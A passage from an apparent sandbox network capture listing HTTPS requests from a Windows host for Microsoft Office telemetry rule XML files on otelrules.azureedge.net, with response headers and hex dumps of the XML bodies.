                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            106192.168.2.44971613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:42 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 2284
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                                                                            x-ms-request-id: 3863d8d3-f01e-0099-536f-359171000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120242Z-1749fc9bdbdnkwnnhC1DFWud0400000002ag00000000df1c
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            107192.168.2.44971713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:42 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                                                                            x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120242Z-16547b76f7ftdm8dhC1DFWs13g0000000khg000000009bv2
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            108192.168.2.44971813.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:42 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                                                                            x-ms-request-id: bf771d7d-301e-001f-16a1-34aa3a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120242Z-r178fb8d765bflfthC1DFWuy9n00000002m0000000005h10
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            109192.168.2.44971913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:42 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1393
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                                                                            x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120243Z-16547b76f7fx6rhxhC1DFW76kg0000000kq0000000000qdh
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            110192.168.2.44972013.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1356
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDF66E42D"
                                                                                                                                                                                                                                            x-ms-request-id: d5f81faf-001e-0017-2ed2-2c0c3c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120243Z-16547b76f7fj897nhC1DFWdwq40000000keg00000000712q
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            111192.168.2.44972113.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE017CAD3"
                                                                                                                                                                                                                                            x-ms-request-id: b51813c1-401e-002a-5f12-32c62e000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120243Z-16547b76f7fr4g8xhC1DFW9cqc0000000hv0000000004654
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            112192.168.2.44972913.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE6431446"
                                                                                                                                                                                                                                            x-ms-request-id: bae79781-201e-0000-5fa1-34a537000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120243Z-1749fc9bdbdht5mthC1DFWph9000000002m0000000006n8x
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            113192.168.2.44973113.107.246.45443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1395
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDE12A98D"
                                                                                                                                                                                                                                            x-ms-request-id: 22e6b9e3-c01e-00a1-75a1-347e4a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120243Z-r178fb8d7657w5c5hC1DFW5ngg00000002n0000000005t9r
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            114192.168.2.46184313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:43 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1358
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                            x-ms-request-id: a48743f7-c01e-007a-73a1-34b877000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120243Z-1749fc9bdbdjznvchC1DFWx4dc00000002dg0000000034ft
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:43 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
